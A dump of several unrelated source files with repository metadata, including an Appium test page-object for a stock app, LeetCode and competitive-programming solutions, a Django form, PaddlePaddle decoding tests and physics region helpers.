_close_search = (MobileBy.ID, 'com.xueqiu.android:id/action_close')
# tab导航
_tab = (MobileBy.XPATH, '//*[@resource-id="android:id/tabs"]//*[@text="$tab"]/..')
def __init__(self, driver: WebDriver = None):
if driver is None:
opts = ["http://127.0.0.1:4723/wd/hub",
{
"platformName": "Android",
"platformVersion": "6.0",
"deviceName": "127.0.0.1:7555",
"automationName": "UiAutomator2",
"appPackage": self._appPackage, # adb shell dumpsys activity top
"appActivity": self._appActivity,
"noRest": True,
"unicodeKeyBoard": True,
"resetKeyBoard": True,
# "avd": "Pixel_23_6", # 启动模拟器
"dontStopAppOnRest": True, # 首次启动 app 时不停止 app(可以调试或者运行的时候提升运行速度)
"skipDeviceInitialization": True, # 跳过安装,权限设置等操作(可以调试或者运行的时候提升运行速度)
# "newCommandTimeout": 300, # 每一条命令执行的间隔时间
# "uuid": "", # 用于
# "autoGrantPermissions": True, # 用于权限管理,设置了这个,就不需要设置 noRest
"chromedriverExecutable": "C:\\webdriver\\chromedriver.exe" # 用于测试 webview 页面
}
]
self._driver = webdriver.Remote(*opts)
else:
self._driver.start_activity(self._appPackage, self._appActivity)
self._driver.implicitly_wait(10)
def find(self, locator):
WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(locator))
return self._driver.find_element(*locator)
def click(self, locator):
ele = WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(locator))
ele.click()
def text(self, locator, value=""):
WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(locator))
if value != "":
self._driver.find_element(*locator).send_keys(value)
else:
return self._driver.find_element(*locator).text
def search(self, value="阿里巴巴"):
self.click(self._search_input)
self.text(self._search_text, value)
def search_and_get_price(self, value="阿里巴巴"):
self.click(self._search_input)
self.text(self._search_text, value)
self.click((self._search_result[0], self._search_result[1].replace("$value", "阿里巴巴")))
return float(self.text((self._result_price[0], self._result_price[1].replace("$value", "阿里巴巴"))))
def search_and_show_attribute(self):
ele = self.find(self._search_input)
search_enabled = ele.is_enabled()
print(ele.text) # 搜索股票/组合/用户/讨论
print(ele.location) # {'x': 219, 'y': 60}
print(ele.size) # {'height': 36, 'width': 281}
if search_enabled:
ele.click()
self.text(self._search_text, "alibaba")
ali_ele = self.find((self._search_result[0], self._search_result[1].replace("$value", "阿里巴巴")))
# ali_ele.is_displayed()
print(ali_ele.get_attribute("displayed")) # true
def move_to(self, cur=None, target=None):
sleep(3)
action = TouchAction(self._driver)
# action.press(x=cur["x"], y=cur["y"]).wait(200).move_to(x=target["x"], y=target["y"]).release().perform()
print(self._driver.get_window_rect())
action.press(x=360, y=1000).wait(200).move_to(x=360, y=280).release().perform()
def scroll_and_search_with_android_selector(self):
loc = (MobileBy.ANDROID_UIAUTOMATOR, 'new UiSelector().text("关注")')
WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(loc))
self._driver.find_element_by_android_uiautomator('new UiSelector().text("关注")').click()
self._driver.find_element_by_android_uiautomator('new UiScrollable(new UiSelector().'
'scrollable(true).instance(0)).'
'scrollIntoView(new UiSelector().text("玉山落雨").'
'instance(0));').click()
sleep(5)
def toast(self):
print(self._driver.page_source)
def clear(self, locator):
self.find(locator).clear()
def search_get_price(self, value, code):
self.click(self._search_input)
self.text(self._search_text, value)
self.click(self._search_result_first)
price = self.text((self._result_price_with_code[0], self._result_price_with_code[1].replace("$code", code)))
self.click(self._close_search)
return price
def mobile_call(self, phone_number="13883256868", action=GsmCallActions.CALL):
"""mumu 模拟器不支持,需要使用原生的"""
# action:
# GsmCallActions.CALL
# GsmCallActions.ACCEPT
# GsmCallActions.CANCEL
# GsmCallActions.HOLD
self._driver.make_gsm_call(phone_number, action)
def msg(self, phone_number="13537773695", message="Hello world!"):
"""mumu 模拟器不支持,需要使用原生的"""
self._driver.send_sms(phone_number, message)
def network(self, connection_type=1):
self._driver.set_network_connection(connection_type)
sleep(3)
self._driver.set_network_connection(6)
sleep(3)
def screenshot_as_file(self, path="./photos/img.png"):
self._driver.get_screenshot_as_file(path)
def webview(self):
self.click((self._tab[0], self._tab[1].replace("$tab", "交易")))
sleep(10)
print(self._driver.contexts)
# 立即开户,切换到 webview
self._driver.switch_to.context(self._driver.contexts[-1])
sleep(10)
# print(self._driver.window_handles)
loc1 = (MobileBy.XPATH, "//*[id='Layout_app_3V4']/div/div/ul/li[1]/div[2]/h1")
WebDriverWait(self._driver, 10).until(EC.element_to_be_clickable(loc1))
self.click(loc1)
sleep(10)
handle = self._driver.window_handles[-1]
self._driver.switch_to.window(handle)
# 开户信息填写
loc2 = (MobileBy.ID, "phone-number")
loc3 = (MobileBy.ID, "code")
loc4 = (MobileBy.CSS_SELECTOR, ".btn-submit")
self.text(loc2, "13810120202")
self.text(loc3, "6666")
self.click(loc4)
| [
"[email protected]"
] | |
e232ea8556be487081ad7ae17a32d47bd88efdad | 31e6ca145bfff0277509dbd7c4b44b8deddf3334 | /LeetCode/Graph/combination-sum.py | 1bad4a940655a4357b9828e4c8a4c2eb18a168a3 | [] | no_license | brillantescene/Coding_Test | 2582d6eb2d0af8d9ac33b8e829ff8c1682563c42 | 0ebc75cd66e1ccea3cedc24d6e457b167bb52491 | refs/heads/master | 2023-08-31T06:20:39.000734 | 2021-10-15T10:51:17 | 2021-10-15T10:51:17 | 254,366,460 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | class Solution:
def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:
result = []
def dfs(csum, index, path):
if csum < 0:
return
if csum == 0:
result.append(path)
return
for i in range(index, len(candidates)):
dfs(csum-candidates[i], i, path+[candidates[i]])
dfs(target, 0, [])
return result
| [
"[email protected]"
] | |
77fd709015fd652698b0f4af3bad2db95658244b | 9766c2e479e99cca5bf7cc834c949fc4d5286275 | /TEST/GUI/00190_page_bdyanalysis/cleanup.py | 016dd73ae3dc45790df8a484acfe062a7795a6de | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | UstbCmsPjy/OOF2 | 4c141e8da3c7e3c5bc9129c2cb27ed301455a155 | f8539080529d257a02b8f5cc44040637387ed9a1 | refs/heads/master | 2023-05-05T09:58:22.597997 | 2020-05-28T23:05:30 | 2020-05-28T23:05:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | removefile('bdyanal.log')
| [
"[email protected]"
] | |
5588a9b58bb4811699015d008966309f1b432923 | 76a01339f7ca19536a07d66e18ff427762157a2a | /codeforces/Python/serval_and_bus.py | 49a999fb8f0c58c2e96f04c61667f1b963aee56a | [] | no_license | shaarangg/CP-codes | 75f99530921a380b93d8473a2f2a588dc35b0beb | 94fc49d0f20c02da69f23c74e26c974dfe122b2f | refs/heads/main | 2023-07-19T21:31:40.011853 | 2021-09-07T05:22:28 | 2021-09-07T05:22:28 | 332,644,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | n,t = map(int,input().split())
m=10**9
j=0
for i in range(n):
s,d = map(int,input().split())
if(t<=s):
a=s-t
else:
a=t-s
if(a%d==0):
a=0
else:
a = (a//d + 1)*d -t + s
if(m>a):
m=a
j=i+1
print(j) | [
"[email protected]"
] | |
a20ec095f9065df80a1ba32f675716abe0875c05 | 26c4426d2c9cd10fd7d4a73609512e69e31b64ba | /justone/mayflower/products/forms.py | 452a35e79f1ecaab5846dfb47812af7c3869b763 | [] | no_license | KirillUdod/html2exc | 550761213eb6edd7d3ea4787938cce65584606c3 | 60569f01822a15b2e5b6884a42774cd428953700 | refs/heads/master | 2021-01-15T17:07:05.906492 | 2016-01-06T11:51:38 | 2016-01-06T11:51:38 | 34,809,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,453 | py | from django import forms
from products.models import Bouquet
class DependenciesForm(forms.ModelForm):
    """
    ModelForm that toggles the ``required`` flag of dependent fields.

    The model may declare a ``dependencies`` dict mapping
    ``(depend_field, depend_field_value) -> field(s)``: the listed field(s)
    become required only when ``depend_field`` currently holds
    ``depend_field_value`` — taken from the submitted data if the form is
    bound, otherwise from the bound instance.

    NOTE(review): uses ``dict.iteritems`` and ``unicode`` — Python 2 only.
    """

    def __init__(self, *args, **kwargs):
        super(DependenciesForm, self).__init__(*args, **kwargs)
        instance = getattr(self, 'instance', None)
        dependencies = getattr(self.Meta.model, 'dependencies', {})
        if isinstance(dependencies, dict):
            for (depend_field, depend_field_value), fields in dependencies.iteritems():
                # Only boolean fields or fields with choices can drive a dependency.
                if not isinstance(self.fields[depend_field], forms.BooleanField)\
                        and not getattr(self.fields[depend_field], 'choices', None):
                    raise ValueError()
                if not isinstance(fields, (list, tuple)):
                    fields = [fields]
                required = False
                if self.data:
                    post_value = self.data.get(self.add_prefix(depend_field))
                    # Checkboxes post 'on'; normalize so it compares equal to True.
                    if post_value == 'on' and isinstance(depend_field_value, bool):
                        post_value = 'True'
                    if post_value == unicode(depend_field_value):
                        required = True
                elif instance and getattr(instance, depend_field, None) == depend_field_value:
                    required = True
                for field in fields:
                    self.fields[field].required = required
class BouquetAdminForm(DependenciesForm):
    """Admin form for Bouquet; inherits the dependency-driven required logic."""

    class Meta:
        model = Bouquet
"[email protected]"
] | |
b19d04a16672a6e82ef0ac5031a632a46feb1e78 | bb150497a05203a718fb3630941231be9e3b6a32 | /framework/api/nn/test_dynamicdecode.py | 3dfc0093a772141b2e3a8044746f517ce9ae1b98 | [] | no_license | PaddlePaddle/PaddleTest | 4fb3dec677f0f13f7f1003fd30df748bf0b5940d | bd3790ce72a2a26611b5eda3901651b5a809348f | refs/heads/develop | 2023-09-06T04:23:39.181903 | 2023-09-04T11:17:50 | 2023-09-04T11:17:50 | 383,138,186 | 42 | 312 | null | 2023-09-13T11:13:35 | 2021-07-05T12:44:59 | Python | UTF-8 | Python | false | false | 20,209 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python
"""
test paddle.nn.dynamic_decode
"""
import random
import paddle
from apibase import compare
import pytest
import numpy as np
from paddle.nn import BeamSearchDecoder, dynamic_decode
from paddle.nn import GRUCell, Linear, Embedding, LSTMCell
from paddle.nn import TransformerDecoderLayer, TransformerDecoder
# Pin every RNG (numpy / python / paddle) so the decoded ids asserted below are reproducible.
np.random.seed(2)
random.seed(2)
paddle.seed(2)
class ModelGRUCell4(paddle.nn.Layer):
    """
    BeamSearchDecoder (beam size 4) over a GRUCell, decoded with the
    default dynamic_decode arguments.
    """

    def __init__(self):
        """
        Build embedding, output projection, GRU cell and beam-search decoder.
        """
        super(ModelGRUCell4, self).__init__()
        self.trg_embeder = Embedding(100, 32)
        self.output_layer = Linear(32, 32)
        self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output (batch 4, seq 8, hidden 32)
        and return the decoded token ids (outputs[0]).
        """
        encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=10
        )
        return outputs[0]
class ModelGRUCell5(paddle.nn.Layer):
    """
    Same as ModelGRUCell4 but decoding with ``output_time_major=True``,
    so the first output axis is the time step.
    """

    def __init__(self):
        """
        Build embedding, output projection, GRU cell and beam-search decoder.
        """
        super(ModelGRUCell5, self).__init__()
        self.trg_embeder = Embedding(100, 32)
        self.output_layer = Linear(32, 32)
        self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output and return the
        time-major decoded token ids (outputs[0]).
        """
        encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder,
            inits=self.decoder_cell.get_initial_states(encoder_output),
            output_time_major=True,
            max_step_num=10,
        )
        return outputs[0]
class ModelGRUCell6(paddle.nn.Layer):
    """
    Same as ModelGRUCell4 but decoding with ``is_test=True`` (inference mode).
    """

    def __init__(self):
        """
        Build embedding, output projection, GRU cell and beam-search decoder.
        """
        super(ModelGRUCell6, self).__init__()
        self.trg_embeder = Embedding(100, 32)
        self.output_layer = Linear(32, 32)
        self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output in test mode and return
        the decoded token ids (outputs[0]).
        """
        encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder,
            inits=self.decoder_cell.get_initial_states(encoder_output),
            is_test=True,
            max_step_num=10,
        )
        return outputs[0]
class ModelGRUCell7(paddle.nn.Layer):
    """
    Same as ModelGRUCell4 but decoding with ``impute_finished=True``, which
    copies through the states of finished beams instead of updating them.
    """

    def __init__(self):
        """
        Build embedding, output projection, GRU cell and beam-search decoder.
        """
        super(ModelGRUCell7, self).__init__()
        self.trg_embeder = Embedding(100, 32)
        self.output_layer = Linear(32, 32)
        self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output and return the decoded
        token ids (outputs[0]).
        """
        encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder,
            inits=self.decoder_cell.get_initial_states(encoder_output),
            impute_finished=True,
            max_step_num=10,
        )
        return outputs[0]
class ModelGRUCell8(paddle.nn.Layer):
    """
    Same as ModelGRUCell4 but decoding with ``return_length=True`` and
    returning the sequence lengths instead of the token ids.
    """

    def __init__(self):
        """
        Build embedding, output projection, GRU cell and beam-search decoder.
        """
        super(ModelGRUCell8, self).__init__()
        self.trg_embeder = Embedding(100, 32)
        self.output_layer = Linear(32, 32)
        self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output; with return_length=True
        the third element of the result holds the decoded sequence lengths.
        """
        encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder,
            inits=self.decoder_cell.get_initial_states(encoder_output),
            return_length=True,
            max_step_num=10,
        )
        return outputs[2]
class ModelLSTMCell1(paddle.nn.Layer):
    """
    BeamSearchDecoder (beam size 4) over an LSTMCell, decoded with the
    default dynamic_decode arguments.
    """

    def __init__(self):
        """
        Build embedding, output projection, LSTM cell and beam-search decoder.
        """
        super(ModelLSTMCell1, self).__init__()
        self.trg_embeder = Embedding(100, 32)
        self.output_layer = Linear(32, 32)
        self.decoder_cell = LSTMCell(input_size=32, hidden_size=32)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output (batch 4, seq 8, hidden 32)
        and return the decoded token ids (outputs[0]).
        """
        encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=10
        )
        return outputs[0]
class ModelLSTMCell2(paddle.nn.Layer):
    """
    Same as ModelLSTMCell1 but with a smaller hidden size (16) and a smaller
    dummy encoder output (batch 4, seq 4, hidden 16).
    """

    def __init__(self):
        """
        Build embedding, output projection, LSTM cell and beam-search decoder.
        """
        super(ModelLSTMCell2, self).__init__()
        self.trg_embeder = Embedding(100, 16)
        self.output_layer = Linear(16, 16)
        self.decoder_cell = LSTMCell(input_size=16, hidden_size=16)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output and return the decoded
        token ids (outputs[0]).
        """
        encoder_output = paddle.ones((4, 4, 16), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=10
        )
        return outputs[0]
class ModelLSTMCell3(paddle.nn.Layer):
    """
    Same as ModelLSTMCell1 but decoding at most 5 steps (max_step_num=5).
    """

    def __init__(self):
        """
        Build embedding, output projection, LSTM cell and beam-search decoder.
        """
        super(ModelLSTMCell3, self).__init__()
        self.trg_embeder = Embedding(100, 32)
        self.output_layer = Linear(32, 32)
        self.decoder_cell = LSTMCell(input_size=32, hidden_size=32)
        self.decoder = BeamSearchDecoder(
            self.decoder_cell,
            start_token=0,
            end_token=1,
            beam_size=4,
            embedding_fn=self.trg_embeder,
            output_fn=self.output_layer,
        )

    def forward(self):
        """
        Decode from a dummy all-ones encoder output with a shorter step limit
        and return the decoded token ids (outputs[0]).
        """
        encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
        outputs = dynamic_decode(
            decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=5
        )
        return outputs[0]
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode0():
    """
    GRUCell decoder with default dynamic_decode arguments.
    """
    model = ModelGRUCell4()
    state = paddle.load("model/model_grucell4")
    model.set_state_dict(state)
    # Every sample in the batch decodes to the same 11-step, 4-beam id matrix.
    steps = [[23, 23, 23, 23], [9, 23, 9, 9]] + [[9, 9, 9, 9]] * 8 + [[9, 9, 23, 27]]
    compare(model().numpy(), [steps] * 4)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode1():
    """
    change the decoder cell to LSTMCell
    """
    model = ModelLSTMCell1()
    model.set_state_dict(paddle.load("model/model_lstmcell1"))
    # Every sample in the batch decodes to the same 11-step, 4-beam id matrix.
    steps = [[4, 4, 22, 4], [4, 4, 4, 4], [30, 20, 20, 30]] + [[30, 30, 30, 30]] * 7 + [[30, 30, 30, 20]]
    compare(model().numpy(), [steps] * 4)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode2():
    """
    change the input size
    """
    model = ModelLSTMCell2()
    model.set_state_dict(paddle.load("model/model_lstmcell2"))
    # Every sample in the batch decodes to the same 11-step, 4-beam id matrix.
    steps = [[4, 4, 4, 4]] * 9 + [[4, 4, 9, 9], [4, 9, 9, 4]]
    compare(model().numpy(), [steps] * 4)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode3():
    """
    change the max_step_num
    """
    model = ModelLSTMCell3()
    model.set_state_dict(paddle.load("model/model_lstmcell3"))
    # With max_step_num=5 only 6 decode steps are produced, identical per sample.
    steps = [
        [4, 4, 22, 4],
        [4, 4, 4, 4],
        [30, 20, 20, 30],
        [30, 30, 30, 30],
        [30, 30, 30, 30],
        [30, 30, 30, 20],
    ]
    compare(model().numpy(), [steps] * 4)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode4():
    """
    set the output_time_major True
    """
    model = ModelGRUCell5()
    model.set_state_dict(paddle.load("model/model_grucell5"))
    # Time-major output: outer axis is the step, each step repeated per sample.
    per_step = [[23, 23, 23, 23], [9, 23, 9, 9]] + [[9, 9, 9, 9]] * 8 + [[9, 9, 23, 27]]
    expected = [[row] * 4 for row in per_step]
    compare(model().numpy(), expected)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode5():
    """
    set the is_test True
    """
    model = ModelGRUCell6()
    model.set_state_dict(paddle.load("model/model_grucell6"))
    # Inference mode must not change the decoded ids.
    steps = [[23, 23, 23, 23], [9, 23, 9, 9]] + [[9, 9, 9, 9]] * 8 + [[9, 9, 23, 27]]
    compare(model().numpy(), [steps] * 4)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode6():
    """
    set the impute_finished True
    """
    model = ModelGRUCell7()
    model.set_state_dict(paddle.load("model/model_grucell7"))
    # Imputing finished beams must not change the decoded ids.
    steps = [[23, 23, 23, 23], [9, 23, 9, 9]] + [[9, 9, 9, 9]] * 8 + [[9, 9, 23, 27]]
    compare(model().numpy(), [steps] * 4)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode7():
    """
    set the return_length True
    """
    model = ModelGRUCell8()
    model.set_state_dict(paddle.load("model/model_grucell8"))
    # All 4 samples x 4 beams decode the full 11 steps.
    compare(model().numpy(), [[11, 11, 11, 11]] * 4)
@pytest.mark.api_nn_dynamic_decode_exception
def test_dynamic_decode10():
    """
    Decoder type error: passing a TransformerDecoder (which has no
    ``initialize`` method) must make dynamic_decode fail.

    Fix: the original try/except silently passed when no exception was
    raised and re-raised a bare Exception on a message mismatch; use
    assert + else so both failure modes are reported with context.
    """
    decoder_cell = LSTMCell(input_size=32, hidden_size=32)
    output_layer = TransformerDecoderLayer(32, 2, 128)
    decoder = TransformerDecoder(output_layer, 2)
    encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
    try:
        dynamic_decode(decoder=decoder, inits=decoder_cell.get_initial_states(encoder_output), max_step_num=10)
    except Exception as e:
        # dynamic_decode calls decoder.initialize(), which TransformerDecoder lacks.
        assert "object has no attribute 'initialize'" in e.args[0]
    else:
        raise AssertionError("dynamic_decode should reject a decoder without initialize()")
# Skip reason (translated): upstream (RD) exception behavior changed, this
# case currently errors — temporarily skipped.
@pytest.mark.skip(reason="RD代码异常改变,此Case会报错,暂时跳过")
@pytest.mark.api_nn_dynamic_decode_exception
def test_dynamic_decode11():
    """dynamic_decode without ``inits`` must raise: the decoder cannot
    derive a state dtype from ``None`` initial states."""
    paddle.seed(33)
    trg_embeder = Embedding(100, 32)
    output_layer = Linear(32, 32)
    decoder_cell = GRUCell(input_size=32, hidden_size=32)
    decoder = BeamSearchDecoder(
        decoder_cell, start_token=0, end_token=1, beam_size=4, embedding_fn=trg_embeder, output_fn=output_layer
    )
    # NOTE(review): silently passes if no exception is raised — see
    # test_dynamic_decode10.
    try:
        dynamic_decode(decoder=decoder, max_step_num=5)
    except Exception as e:
        error = "'NoneType' object has no attribute 'dtype'"
        if error in e.args[0]:
            pass
        else:
            raise Exception
# Skip reason (translated): upstream (RD) exception behavior changed, this
# case currently errors — temporarily skipped.
@pytest.mark.skip(reason="RD代码异常改变,此Case会报错,暂时跳过")
@pytest.mark.api_nn_dynamic_decode_exception
def test_dynamic_decode12():
    """dynamic_decode must raise when the size of ``inits`` does not match
    the decoder cell (states of shape [16] for a hidden_size=32 cell)."""
    paddle.seed(33)
    trg_embeder = Embedding(100, 32)
    output_layer = Linear(32, 32)
    decoder_cell = LSTMCell(input_size=32, hidden_size=32)
    decoder = BeamSearchDecoder(
        decoder_cell, start_token=0, end_token=1, beam_size=4, embedding_fn=trg_embeder, output_fn=output_layer
    )
    encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
    # Deliberately undersized initial states (16 instead of 32).
    decoder_initial_states = [
        decoder_cell.get_initial_states(encoder_output, shape=[16]),
        decoder_cell.get_initial_states(encoder_output, shape=[16]),
    ]
    # NOTE(review): silently passes if no exception is raised — see
    # test_dynamic_decode10.
    try:
        dynamic_decode(decoder=decoder, inits=decoder_initial_states, max_step_num=5)
    except Exception as e:
        # The shape mismatch surfaces as a matmul operator error.
        if "[operator < matmul_v2 > error]" in e.args[0]:
            pass
        else:
            raise Exception
| [
"[email protected]"
] | |
ec1d8c4d661870efcce6dd2ea0b18baee2087b45 | f21109a5c23340447d0e3d34f14299c30e49d023 | /Dynamic Programming/11. Longest Common Subsequence.py | a8f0e898a3fad5f7001ac206032d7ee02a013de3 | [] | no_license | ShashankSinha98/FAANG-Questions | 45366004c3176a3c11ef554a25a11fe21e53ebca | 73ef742b3747e89d32d384baa6acf35044bf3ce0 | refs/heads/master | 2022-12-21T09:42:51.796086 | 2020-09-24T08:24:47 | 2020-09-24T08:24:47 | 286,765,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | t = int(input())
def common_lcs(str1, n, str2, m):
    """Length of the longest common subsequence of str1[:n] and str2[:m].

    Classic DP, kept as two rolling rows instead of the full (n+1)x(m+1)
    table; the recurrence and result are unchanged.
    """
    prev_row = [0] * (m + 1)
    for i in range(1, n + 1):
        cur_row = [0] * (m + 1)
        for j in range(1, m + 1):
            if str1[i - 1] == str2[j - 1]:
                cur_row[j] = prev_row[j - 1] + 1
            else:
                cur_row[j] = max(prev_row[j], cur_row[j - 1])
        prev_row = cur_row
    return prev_row[m]
def display(arr):
    """Print a 2-D table: each row space-separated (with a trailing space),
    one row per line, followed by one blank line."""
    for row in arr:
        print("".join(str(cell) + " " for cell in row))
    print()
# Process t test cases from stdin: each case is a line "n m" followed by the
# two strings, and prints the LCS length. (t is read from stdin above.)
while t!=0:
    t-=1
    n,m = [int(i) for i in input().split()]
    str1 = input()
    str2 = input()
    res = common_lcs(str1,n,str2,m)
    print(res)
"[email protected]"
] | |
f6813e579cbf76ee872102859d44f28c4c47746b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03107/s767358209.py | f9a07c556a610f1f56bccfb4d8bc42ed0285d230 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | s = input()
# s is the binary string read from stdin above (presumably '0'/'1' chips —
# TODO confirm). Each removal takes one '0' and one '1', so the number of
# characters removed is twice the smaller count.
red = s.count("0")
blue = s.count("1")
num = min(red,blue)
print(num*2)
"[email protected]"
] | |
446d6d7faa595deb53a808126c8a2aced62533ca | 00b86f883694b17575a514227960b963d3b6179b | /Analysis/python/regions.py | fd5293018c7e89c2e26d88fe5e64bddca3efeb61 | [] | no_license | HephyAnalysisSW/TTZRun2EFT | 1b33a6bad49d0d6e119e49c74faa35dee0e4bb0e | 730a7465d4cbde52649965ed0e2a5b29bcc309c3 | refs/heads/master | 2020-04-30T16:40:46.454225 | 2019-04-18T08:09:46 | 2019-04-18T08:09:46 | 176,956,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,950 | py | from TTZRun2EFT.Analysis.Region import Region
from TTZRun2EFT.Analysis.Region import texString
from TTZRun2EFT.Analysis.Region import allowedVars
from math import pi
def getRegionsFromThresholds(var, vals, gtLastThreshold = True):
    """Bin *var* into Regions spanning consecutive threshold pairs."""
    # NOTE(review): gtLastThreshold is currently unused — confirm intent.
    return [Region(var, bounds) for bounds in zip(vals, vals[1:])]
def getRegions2D(varOne, varOneThresholds, varTwo, varTwoThresholds):
    """Cartesian product of two 1-D binnings, one combined Region per cell."""
    binsOne = getRegionsFromThresholds(varOne, varOneThresholds)
    binsTwo = getRegionsFromThresholds(varTwo, varTwoThresholds)
    return [rOne + rTwo for rOne in binsOne for rTwo in binsTwo]
def simpleStringToDict( simpleString ):
    """Parse a simple region string (e.g. "ptAToB_etaC") into
    {variable: (low, high)}; an open upper bound is encoded as -1."""
    # Encode each known variable as a placeholder containing no "_",
    # so splitting on "_" below cannot break inside a variable name.
    for idx, varName in enumerate(allowedVars):
        simpleString = simpleString.replace(varName, "var%i"%idx)
    cutDict = {}
    for token in simpleString.split("_"):
        for idx, varName in enumerate(allowedVars):
            placeholder = "var%i"%idx
            if placeholder not in token:
                continue
            # Strip the placeholder, split the range on "To", parse floats.
            bounds = tuple(map(float, token.replace(placeholder, "").split("To")))
            if len(bounds) == 1:
                bounds = (bounds[0], -1)
            cutDict[varName] = bounds
    return cutDict
def dictToCutString( dict ):
    """Render {variable: (low, high)} as a "&&"-joined cut string;
    high == -1 means no upper bound."""
    clauses = []
    for var in dict:
        low, high = dict[var][0], dict[var][1]
        clause = var + ">=" + str(low)
        if high > -1:
            clause += "&&" + var + "<" + str(high)
        clauses.append(clause)
    return "&&".join(clauses)
def simpleStringToCutString( cutString ):
    """Translate a simple region string straight into a cut string."""
    parsed = simpleStringToDict( cutString )
    return dictToCutString( parsed )
# Region sets used throughout the analysis (closure tests, tables, etc.).
# Differential binning in generator-level photon pT; -999 marks the open
# overflow bin.
thresholds = [ 20, 120, 220, 320, 420, -999 ]
genTTZRegions = getRegionsFromThresholds( "GenPhoton_pt[0]", thresholds )
| [
"[email protected]"
] | |
f0b5d8049387f82fdc10423ed90621cbe0c3bdef | 444a9480bce2035565332d4d4654244c0b5cd47b | /research/nlp/dgu/src/dataset.py | b0e7e7d67e9e558b44bf62623dcbbab8f34c71a8 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
